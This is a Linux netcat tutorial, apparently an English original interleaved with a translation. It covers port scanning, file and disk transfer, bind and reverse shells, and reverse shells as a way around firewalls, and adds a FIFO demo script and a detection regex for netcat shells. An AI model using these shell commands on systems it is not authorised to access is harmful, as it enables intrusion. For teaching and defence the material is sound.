netcat is the Swiss Army knife of networking tools: it reads and writes data across the network over TCP and UDP. Combined with other tools and with redirection, you can use it in scripts in many ways. What you can accomplish with the netcat command is surprising. All netcat does is open a connection between two computers and hand back two data streams; what you do after that is up to your imagination. You can set up a server, transfer files, chat with a friend, stream media, or use it as a standalone client for other protocols. Below are some examples of using netcat.

Machines used in the examples: [A(172.31.100.7) B(172.31.100.23)]
Linux netcat command examples

1. Port scanning

Port scanning is done by system admins and hackers to find the open ports on a machine. It helps them identify vulnerabilities in the system.

    $ nc -z -v -n 172.31.100.7 21-25

It can work in both TCP and UDP mode; the default is TCP, and the -u option switches to UDP. The -z option tells netcat to use zero I/O, i.e. the connection is closed as soon as it opens and no actual data exchange takes place. This command will print all the open ports between 21 and 25.

A banner is the text a service sends when you connect to it. Banners are very useful when you are trying to find vulnerabilities in a system, as they identify the type and version of the service. NOTE: not all services send a banner.

    $ nc -v 172.31.100.7 21

The Linux netcat command will connect to open port 21 and print the banner of the service running on that port.
Translation:

Linux netcat command examples

1. Port scanning

Port scanning is often used by system administrators and hackers to discover the open ports on machines, helping them identify vulnerabilities in a system.

    $ nc -z -v -n 172.31.100.7 21-25

It can run in TCP or UDP mode; the default is TCP, and the -u option switches to UDP. The -z option tells netcat to use zero I/O: the connection is closed as soon as it succeeds, without any data exchange (thanks to @jxing for the pointer). The -v option means verbose (translator's note: i.e. detailed output). The -n option tells netcat not to resolve the IP address to a host name via reverse DNS lookup. This command prints all open ports between 21 and 25.

A banner is a text message that the service you connect to sends back to you. Banner information is very useful when you are trying to identify vulnerabilities or the type and version of a service. However, not every service sends a banner. Once you have found an open port, you can easily connect to the service with netcat and grab its banner.

    $ nc -v 172.31.100.7 21

The netcat command connects to open port 21 and prints the banner of the service running on that port.
2. Chat server

If you want to chat with your friend, there are numerous software and messenger services at your disposal. But what if you no longer have that luxury, for example inside your computer lab where all outside connections are restricted: how will you communicate with your friend sitting in the next room? Don't worry, my friend, because netcat has a solution for you: just create a chat server on a predetermined port and he can connect to you.

Server

    $ nc -l 1567

The Linux netcat command starts a TCP server on port 1567 with stdout and stdin as the output and input streams, i.e. the output is displayed in the shell and the input is read from the shell.

Client

    $ nc 172.31.100.7 1567

After this, whatever you type on machine B will appear on A, and vice versa.
Translation:

2. Chat server

Suppose you want to chat with a friend; there is plenty of software and messaging services you can use. But if you do not have such luxurious facilities, for example in a computer lab where all outbound connections are restricted, how do you talk to the friend who sits all day in the next room? Don't be depressed: netcat offers a way. You only need to create a chat server on a predetermined port, and he can contact you.

Server

    $ nc -l 1567

The netcat command starts a TCP server on port 1567; standard output and standard input are tied to that port, and both output and input are shown in this shell.

Client

    $ nc 172.31.100.7 1567

Whatever you type on machine B will appear on machine A.
3. File transfer

Most of the time we are trying to transfer a file over the network and stumble upon the problem of which tool to use. There are again numerous methods available, like FTP, SCP, SMB, etc. But is it really worth the effort to install and configure such complicated software and create a server on your machine when you only need to transfer one file, and only once?

Suppose you want to transfer a file "file.txt" from A to B.

Server

    $ nc -l 1567 < file.txt

Client

    $ nc -n 172.31.100.7 1567 > file.txt

Here we have created a server at A and redirected netcat's input from the file file.txt, so when any connection succeeds netcat sends the content of the file. Again, at the client we have redirected netcat's output to file.txt. When B connects to A, A sends the file content and B saves that content to the file file.txt.

It is not necessary to make the source of the file the server; we can work in the opposite order as well. In the case below we are sending the file from B to A, but the server is created at A. This time we only need to redirect the output of netcat at A to the file and the input at B from the file.

B as server

    $ nc -l 1567 > file.txt

Client

    $ nc 172.31.100.23 1567 < file.txt
Translation:

3. File transfer

Most of the time we are trying to transfer files over the network or with other tools. There are many methods, such as FTP, SCP, SMB and so on, but when you only need to transfer a file temporarily or once, is it really worth the time to install and configure a piece of software on your machine? Suppose you want to send a file file.txt from A to B. Either A or B can act as the server or the client; below, A is the server and B the client.

Server

    $ nc -l 1567 < file.txt

Client

    $ nc -n 172.31.100.7 1567 > file.txt

Here we create a server on A and redirect netcat's input from the file file.txt, so whenever a connection to that port succeeds, netcat sends the file's contents. On the client we redirect the output to file.txt; when B connects to A, A sends the file contents and B saves them to file.txt.

It is not necessary for the file source to be the server; we can also do it the other way round. In the example below we send the file from B to A, but the server is created on A; this time we only need to redirect netcat's output and redirect B's input from the file.

B as server

Server

    $ nc -l 1567 > file.txt

Client

    $ nc 172.31.100.23 1567 < file.txt
4. Directory transfer

Sending a file is easy, but what if we want to send more than one file, or a whole directory? It's easy: just use the archive tool tar to archive the files first and then send the archive. Suppose you want to transfer a directory over the network from A to B.

Server

    $ tar -cvf - dir_name | nc -l 1567

Client

    $ nc -n 172.31.100.7 1567 | tar -xvf -

Here at server A we are creating the tar archive and directing its output to the console through "-". Then we pipe it to netcat, which is used to send it over the network. At the client we are just downloading the archive from the server using netcat and piping its output to the tar tool to extract the files.

Want to conserve bandwidth by compressing the archive? We can use bzip2 or another tool specific to the content of the files.

Server

    $ tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress the archive using the bzip2 utility.

Client

    $ nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

Decompress the archive using the bzip2 utility.
Translation:

4. Directory transfer

Sending one file is simple, but if we want to send several files, or a whole directory, it is just as simple: use the archiving tool tar, and send the archive it produces. Suppose you want to transfer a directory from A to B over the network.

Server

    $ tar -cvf - dir_name | nc -l 1567

Client

    $ nc -n 172.31.100.7 1567 | tar -xvf -

Here, on server A, we create a tar archive and direct it to the console via "-", then pipe it to netcat, which sends it over the network. On the client we download the archive through netcat and pipe it to tar to unpack the files.

If you want to save bandwidth by sending a compressed archive, you can compress it with bzip2 or another tool.

Server

    $ tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress with bzip2.

Client

    $ nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

Decompress with bzip2.
5. Encrypt your data when sending over the network

If you are worried about the security of data being sent over the network, you can encrypt your data before sending it using some tool like mcrypt.

Server

    $ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Decrypt the received data using the mcrypt tool (-d).

Client

    $ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Encrypt the data using the mcrypt tool.

Here we have used mcrypt for encryption, but any tool can be used.
Translation:

5. Encrypt the data you send over the network

If you are worried about the security of the data you send over the network, you can encrypt it before sending with a tool such as mcrypt.

Server

    $ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Decrypt the received data with the mcrypt tool (-d).

Client

    $ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Encrypt the data with the mcrypt tool.

Both commands will prompt for a password; make sure both ends use the same password. Here we use mcrypt for encryption, but any other encryption tool would do.
6. Stream a video

Not the best method to stream, but if the server doesn't have the specific tools, then with netcat we still have hope.

Server

    $ cat video.avi | nc -l 1567

Here we are just reading the video file and redirecting its output to netcat.

Client

    $ nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we are reading the data from the socket and redirecting it to mplayer.
Translation:

6. Stream a video

Although not the best way to produce a video stream, if the server has no dedicated tools, we can still hope to get it done with netcat.

Server

    $ cat video.avi | nc -l 1567

Here we just read from a video file and redirect the output to netcat.

Client

    $ nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we read data from the socket and redirect it to mplayer.
7. Cloning a device

If you have just installed and configured a Linux machine and have to do the same to another machine too, you do not want to do the configuration again. No need to repeat the process: just boot the other machine with some bootable pen drive and clone your machine. Cloning a Linux PC is very simple. Suppose your system disk is /dev/sda.

Server

    $ dd if=/dev/sda | nc -l 1567

Client

    $ nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd is a tool which reads the raw data from the disk; we are just redirecting its output stream through a netcat server to the other machine and writing it to the disk. It will copy everything along with the partition table. But if we have already done the partitioning and need to move only the root partition, we can change sda to sda1, sda2, etc., depending on where our root is installed.
Translation:

7. Cloning a device

If you have already installed and configured one Linux machine and need to repeat the same work on other machines, but do not want to go through the configuration again, there is no need to repeat the install and configuration process: just boot the other machine from a bootable USB drive and clone your machine. Cloning a Linux PC is simple. Suppose your system is on the disk /dev/sda.

Server

    $ dd if=/dev/sda | nc -l 1567

Client

    $ nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd is a tool that reads raw data from a disk; we redirect its output stream through the netcat server to the other machine and write it to the disk there. It copies everything, including the partition table. But if we have already partitioned and only need to clone the root partition, we can change sda to sda1, sda2, etc., according to where the root partition of our system lives.
8. Opening a shell

We have used remote shells via telnet and ssh, but what if they are not installed and we do not have permission to install them? Then we can create a remote shell using netcat as well.

If your netcat supports the -c and -e options (traditional netcat):

Server

    $ nc -l 1567 -e /bin/bash -i

Client

    $ nc 172.31.100.7 1567

Here we have created a netcat server and told it to run the /bin/bash command when a connection succeeds.

If netcat doesn't support the -c or -e options (OpenBSD netcat), we can still create a remote shell.

Server

    $ mkfifo /tmp/tmp_fifo
    $ cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we have created a FIFO. Then we pipe the content of this FIFO file to a shell; 2>&1 is used to redirect stderr to the same place as stdout, which is piped to the netcat server running on port 1567. Then we redirect the output of netcat back to the FIFO file.

Explanation: the input received from the network is written to the FIFO file. The FIFO file is read by the cat command and its content is sent to the sh command. sh processes the received input and writes the result back to netcat. Netcat sends the output over the network to the client. All this is possible because a pipe causes the commands to run in parallel. The FIFO file is used instead of a regular file because the FIFO causes the read to wait, whereas with an ordinary file the cat command would have ended as soon as it started reading an empty file.

At the client it is as simple as connecting to the server:

    $ nc -n 172.31.100.7 1567

And you will get a shell prompt at the client.
Translation:

8. Opening a shell

We have used remote shells before, via telnet and ssh, but if these two commands are not installed and we have no permission to install them, we can also create a remote shell with netcat.

Suppose your netcat supports the -c and -e options (the default netcat):

Server

    $ nc -l 1567 -e /bin/bash -i

Client

    $ nc 172.31.100.7 1567

Here we have created a netcat server and told it to execute /bin/bash when the connection succeeds.

If netcat does not support the -c or -e options (OpenBSD netcat), we can still create a remote shell.

Server

    $ mkfifo /tmp/tmp_fifo
    $ cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we create a FIFO file, then use a pipe to send the contents of the FIFO to the shell. 2>&1 redirects standard error to standard output, which is then piped to netcat listening on port 1567. Finally, we redirect netcat's output into the FIFO file.

Explanation: input received from the network is written to the FIFO file; the cat command reads the FIFO and sends its contents to the sh command; the sh process receives the input and writes the result back to netcat; netcat sends the output over the network to the client. The reason this works is that pipes run the commands in parallel, and the FIFO is used instead of a regular file because a FIFO makes the read wait, whereas with a regular file cat would finish immediately after starting to read an empty file.

On the client we simply connect to the server.

Client

    $ nc -n 172.31.100.7 1567

You will get a shell prompt on the client.
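The FIFO point made above, as an added example that is not part of the original page: a reader on an empty regular file returns at once, while a reader on a FIFO blocks until a writer opens the other end, which is what keeps the fifo-based loop alive. The paths under a temporary directory are constructed for this example and no network is involved.

```shell
#!/bin/sh
# Added example, not from the original page: why the fifo-based shell loop
# needs a FIFO rather than a regular file. A reader on an empty regular file
# hits end-of-file immediately, while a reader on a FIFO blocks until a writer
# opens the other end. Paths are constructed under a temporary directory.

work="${TMPDIR:-/tmp}/fifo_demo.$$"
mkdir -p "$work"

# Returns 0 when cat on an empty regular file returns at once with no output,
# which is what would make the tutorial's loop exit before any input arrives.
regular_file_read_ends_immediately() {
    : > "$work/empty.txt"
    out=$(cat "$work/empty.txt")
    [ -z "$out" ]
}

# Returns 0 when a reader on a FIFO is still blocked one second after it
# started, and then receives the line as soon as a writer opens the FIFO.
fifo_read_waits_for_writer() {
    rm -f "$work/pipe"
    mkfifo "$work/pipe" || return 1
    cat "$work/pipe" > "$work/received.txt" &
    reader=$!
    sleep 1
    # kill -0 only succeeds if the reader is still alive, i.e. blocked in open()
    kill -0 "$reader" 2>/dev/null || return 1
    # constructed input line; opening the write end unblocks the reader
    printf 'hello from the writer\n' > "$work/pipe"
    wait "$reader"
    [ "$(cat "$work/received.txt")" = "hello from the writer" ]
}

cleanup() {
    rm -rf "$work"
}

if [ "${1:-}" = "demo" ]; then
    regular_file_read_ends_immediately && echo "regular file: cat returned immediately"
    fifo_read_waits_for_writer && echo "fifo: cat waited for the writer"
    cleanup
fi
```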
9. Reverse shell

A reverse shell is a shell opened at the client side. Reverse shells are so named because, unlike the other configurations, here the server is using a service provided by the client.

Server

    $ nc -l 1567

At the client side, simply tell netcat to execute the shell when the connection is complete.

Client

    $ nc 172.31.100.7 1567 -e /bin/bash

Now, what is so special about a reverse shell?
Translation:

Reverse shell

A reverse shell is a shell opened on the client side. It is called a reverse shell because, unlike the other configurations, here the server uses a service provided by the client.

Server

    $ nc -l 1567

On the client, simply tell netcat to execute the shell once the connection completes.

Client

    $ nc 172.31.100.7 1567 -e /bin/bash

Now, what is special about a reverse shell? Reverse shells are often used to get around firewall restrictions such as blocking inbound connections. For example, I have a private IP address 172.31.100.7 and use a proxy server to reach the outside network. If I want to access the shell of this machine from outside the network, say from 1.2.3.4, I would use a reverse shell for that purpose.
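Defensive counterpart to sections 8 and 9, added here and not part of the original page: a small check that flags process command lines matching the shell-over-netcat patterns shown above (nc given -e or -c with a shell, or an interactive shell piped into nc). The sample command lines and the regular expression are constructed for this example.

```shell
#!/bin/sh
# Added example, not from the original page: flag command lines that match the
# shell-over-netcat patterns from sections 8 and 9. The sample command lines
# below are constructed for this example, not taken from a real host.

sample_cmdlines='nc -l 1567 -e /bin/bash -i
nc 172.31.100.7 1567 -e /bin/bash
cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
nc -z -v -n 172.31.100.7 21-25
tar -cvf - dir_name | nc -l 1567
nc -l 1567 < file.txt'

# Pattern 1: nc/ncat/netcat given -e or -c with a shell as the program to run.
# Pattern 2: an interactive shell (sh -i / bash -i) whose output is piped into nc.
shell_over_nc_pattern='(^|[[:space:]])(nc|ncat|netcat)[[:space:]].*-[ec][[:space:]]+/bin/(ba)?sh|/bin/(ba)?sh[[:space:]]+-i.*\|[[:space:]]*(nc|ncat|netcat)'

# Prints every sample command line that matches one of the two patterns.
flag_netcat_shells() {
    printf '%s\n' "$sample_cmdlines" | grep -E "$shell_over_nc_pattern"
}

# Prints the number of flagged sample lines (3 for the samples above: the two
# nc -e invocations and the fifo loop; the scan, tar and file-transfer lines
# are not flagged).
count_flagged() {
    flag_netcat_shells | wc -l | tr -d ' '
}

# Returns 0 if a single command line looks like a shell over netcat.
is_shell_over_nc() {
    printf '%s\n' "$1" | grep -Eq "$shell_over_nc_pattern"
}

if [ "${1:-}" = "demo" ]; then
    echo "flagged command lines:"
    flag_netcat_shells
fi
```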
Reposted from: https://www.oschina.net/translate/linux-netcat-command?cmp